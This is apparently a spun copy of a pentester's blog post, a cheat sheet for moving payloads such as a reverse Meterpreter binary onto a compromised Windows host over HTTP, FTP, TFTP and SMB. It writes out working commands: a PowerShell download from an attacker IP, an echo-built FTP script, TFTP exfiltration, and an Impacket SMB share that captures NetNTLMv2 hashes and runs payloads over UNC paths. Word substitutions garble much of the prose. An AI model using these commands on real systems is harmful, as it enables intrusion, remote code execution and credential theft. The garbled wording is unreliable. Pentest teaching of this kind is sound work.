Transferring Files From Linux To Windows (Post-Exploitation)

Table of Contents

HTTP

FTP

TFTP

SMB

Summary

Often times on an appointment I discovery myself needing to re-create a tool or a payload from my Kali linux laid on box to a compromised Windows machine. As a perfect example, on a recent pentest, I constitute a vulnerable ColdFusion server together with was able to upload a CFM webshell. It was a really limited, non-interactive trounce together with I wanted to download together with execute a opposite Meterpreter binary from my laid on machine. I generated the payload amongst Veil but needed a manner to transfer the file to the Windows server running ColdFusion through uncomplicated commands.
I'm putting this postal service together every bit a "cheat sheet" of sorts for my favorite ways to transfer files.
For purposes of demonstration, the file I'll endure copying over using all these methods is called met8888.exe together with is located inwards /root/shells.

HTTP

Downloading files via HTTP is pretty straightforward if you lot receive got access to the desktop together with tin opened upwardly up a spider web browser, but it's also possible to create it through the ascendence describe every bit well.

Starting the Server

The ii ways I commonly serve a file over HTTP from Kali are either through Apache or through a Python HTTP server.
To serve a file upwardly over Apache, exactly only re-create it to /var/www/html together with enable the Apache service. Apache is installed past times default inwards Kali:

The other selection is to exactly start a Python webserver straight within the shells directory. This exclusively requires a unmarried describe of Python thank you lot to Python's SimpleHTTPServer module:

python -m SimpleHTTPServer   

By default it serves on port 8000, but you lot tin also specify a port release at the end.

While this is running, all files within the electrical flow directory volition endure accessible over HTTP. Ctrl-C volition kill the server when you're done.

Downloading the files

If you lot receive got desktop access, only browse to http://YOUR-KALI-IP/shell8888.exe together with usage the browser to download the file:

If you lot exclusively receive got ascendence describe access (e.g. through a shell), downloading via HTTP is a fiddling trickier every bit there's no built-in Windows equivalent to curl or wget. The best selection is to usage PowerShell's WebClient object:

(new-object System.Net.WebClient).DownloadFile('http://10.9.122.8/met8888.exe','C:\Users\jarrieta\Desktop\met8888.exe') 

You tin telephone outcry upwardly this from a normal Windows ascendence prompt every bit well:

There's a few other methods outlined here, but I don't call upwardly whatever of them are every bit straightforward every bit the PowerShell snippet above.

FTP

Another selection to transfer files is FTP. Windows has a built inwards FTP customer at C:\Windows\System32\ftp.exe thus this selection should virtually ever work.

Starting the Server

You tin definitely install a full-featured FTP server similar vsftpd inwards Kali, but I discovery that's frequently overkill. I exactly desire a simple, temporary FTP server that I tin spin upwardly together with downwards to part files. The ii best ways to create this are amongst Python or Metasploit.
Python. The pytftpd library, similar the HTTP i above, lets you lot spin upwardly a Python FTP server inwards i line. It doesn't come upwardly installed past times default, but you lot tin install it amongst apt:

apt-get install python-pyftpdlib   

Now from the directory you lot desire to serve, exactly run the Python module. With no arguments it runs on port 2121 together with accepts anonymous authentication. To head on the touchstone port:
One create goodness of using FTP over HTTP is the might to transfer files both way. If you lot desire to grant the anonymous user write access, add together the -w flag every bit well.
Metasploit. There is also an auxiliary FTP server built inwards to Metasploit every bit good that is slow to deploy together with configure. It's located at auxiliary/server/ftp. Set the FTPROOT to the directory you lot desire to part together with run exploit:

The server volition run inwards the background. Kill it amongst jobs -k <id>

Downloading the files

As mentioned earlier, Windows has an FTP customer built inwards to the PATH. You tin opened upwardly an FTP connecter together with download the files straight from Kali on the ascendence line. Authenticate amongst user anonymous together with whatever password

Now this is slap-up if you lot receive got an interactive trounce where you lot tin genuinely drib into the FTP prompt together with final result commands, but it's non that useful if you lot exactly receive got ascendence injection together with tin exclusively final result i ascendence at a time.
Fortunately, windows FTP tin convey a "script" of commands straight from the ascendence line. Which agency if nosotros receive got a text file on the organisation that contains this:

open 10.9.122.8   anonymous   whatever   binary   larn met8888.exe   cheerio   

nosotros tin only run ftp -s:ftp_commands.txt together with nosotros tin download a file amongst no user interaction.
How to larn that text file? We tin echo into it i describe at at time:

C:\Users\jarrieta\Desktop>echo opened upwardly 10.9.122.8>ftp_commands.txt   C:\Users\jarrieta\Desktop>echo anonymous>>ftp_commands.txt   C:\Users\jarrieta\Desktop>echo whatever>>ftp_commands.txt   C:\Users\jarrieta\Desktop>echo binary>>ftp_commands.txt   C:\Users\jarrieta\Desktop>echo larn met8888.exe>>ftp_commands.txt   C:\Users\jarrieta\Desktop>echo bye>>ftp_commands.txt   C:\Users\jarrieta\Desktop>ftp -s:ftp_commands.txt   

Or, create it all inwards i long line:

C:\Users\jarrieta\Desktop>echo opened upwardly 10.9.122.8>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo larn met8888.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt   

Either manner you'll goal upwardly amongst met8888.exe on the Windows host.

TFTP

Trivial file transfer protocol is unopen to other possiblity if tftp is installed on the system. It used to endure installed past times default inwards Windows XP, but immediately needs to endure manually enabled on newer versions of Windows. If the Windows machine you lot receive got access to happens to receive got the tftp customer installed, however, it tin brand a genuinely convenient manner to catch files inwards a unmarried command.

Starting the Server

Kali comes amongst a TFTP server installed, atftpd, which tin endure started amongst a uncomplicated service atftpd start. I've ever had a hell of a fourth dimension getting it configured together with working though, together with I rarely necessitate to start together with expire along running a TFTP server every bit a service, thus I exactly usage the simpler Metasploit module.
Metasploit, similar amongst FTP, has an auxiliary TFTP server module at auxiliary/server/tftp. Set the module options, including TFTPROOT, which determines which directory to serve up, together with OUTPUTPATH if you lot desire to capture TFTP uploads from Windows every bit well.

Downloading the Files

Again, assuming the tftp utility is installed, you lot tin catch a file amongst i describe from the Windows prompt. It doesn't require whatever authentication. Just only usage the -i flag together with the GET action.

Exfiltrating files via TFTP is uncomplicated every bit good amongst the PUT action. The Metasploit server saves them inwards /tmp past times default

TFTP is a convenient, uncomplicated manner to transfer files every bit it doesn't require authentication together with you lot tin create everything inwards a unmarried command.
Sidenote: Installing TFTP. As I mentioned, TFTP is non included past times default on newer versions of Windows. If you lot genuinely wanted to, you lot tin genuinely enable TFTP from the ascendence line:

pkgmgr /iu:"TFTP"   

Might come upwardly inwards handy, but I'd ever rather "live off the land" together with usage tools that are already available.

SMB

This is genuinely my favorite method to transfer a file to a Windows host. SMB is built inwards to Windows together with doesn't require whatever particular commands every bit Windows understands UNC paths. You tin only usage the touchstone copy together with move commands together with SMB handles the file transferring automatically for you. What's fifty-fifty ameliorate is Windows volition genuinely permit you lot execute files via UNC paths, pregnant you lot tin download together with execute a payload inwards i command!

Setting upwardly the Server

Trying to larn Samba ready together with configured properly on Linux is a pain. You receive got to configure authentication, permissions, etc together with it's quite frankly manner overkill if I exactly desire to download i file. Now Samba an genuinely create unopen to really cool materials when you lot configure it to play nicely amongst Windows AD, but most of the fourth dimension I exactly desire a super uncomplicated server upwardly together with running that accepts whatever authentication together with serves upwardly or accepts files.
Enter smbserver.py, component of the Impacket project. Maybe i twenty-four sixty minutes menstruation I'll write a blogpost without mentioning Impacket, but that twenty-four sixty minutes menstruation is non today.
To launch a uncomplicated SMB server on port 445, exactly specify a part call together with the path you lot desire to share:

# python smbserver.py ROPNOP /root/shells 

The python script takes aid of all the configurations for you, binds to 445, together with accepts whatever authentication. It volition fifty-fifty impress out the hashed challenge responses for whatever organisation that connects to it.

In i describe we've got an SMB part upwardly together with running. You tin confirm it amongst smbclient from Linux:

Or amongst net view from Windows:

Copying the Files

Since Windows handles UNC paths, you lot tin exactly process the ROPNOP part every bit if it's exactly a local folder from Windows. Basic Windows file commands similar dir, copy, move, etc all exactly work:


If you lot expect at the output from smbserver.py, you lot tin run into that every fourth dimension nosotros access the part it outputs the NetNTLMv2 hash from the electrical flow Windows user. You tin feed these into John or Hashcat together with crevice them if you lot desire (assuming you lot can't exactly lift to System together with larn them from Mimikatz)

Executing files from SMB. Because of the manner Windows treats UNC paths, it's possible to exactly execute our binary straight from the SMB part without fifty-fifty needing to re-create it over first. Just run the executable every bit if it were already local together with the payload volition fire:

This proved incredibly useful during unopen to other ColdFusion exploit I came across. After gaining access to an unprotected ColdFusion admin panel, I was able to configure a "system probe" to burn when a bear witness failed. It permit me execute a plan every bit a failure action, together with I exactly used a UNC path to execute a Meterpreter payload hosted from my Kali machine:

When the probe failed, ColdFusion connected to my SMB part together with executed the payload together with I was off together with running.

Summary

H5N1 expert pentester needs to "live off the land" together with know several unlike ways to transfer files. You can't ever count on an interactive shell, permit lonely a GUI, thus agreement unlike commands together with techniques to transfer together with execute payloads is crucial.
I outlined a few unlike techniques using 4 unlike protocols:

• HTTP
• FTP
• TFTP
• SMB

Their usage depends on what's available on the target together with what's allowed on the network.
Hope this postal service helps someone together with tin serve every bit a "cheat sheet" of sorts. Let me know if I missed whatever of your favorite techniques!
-ropnop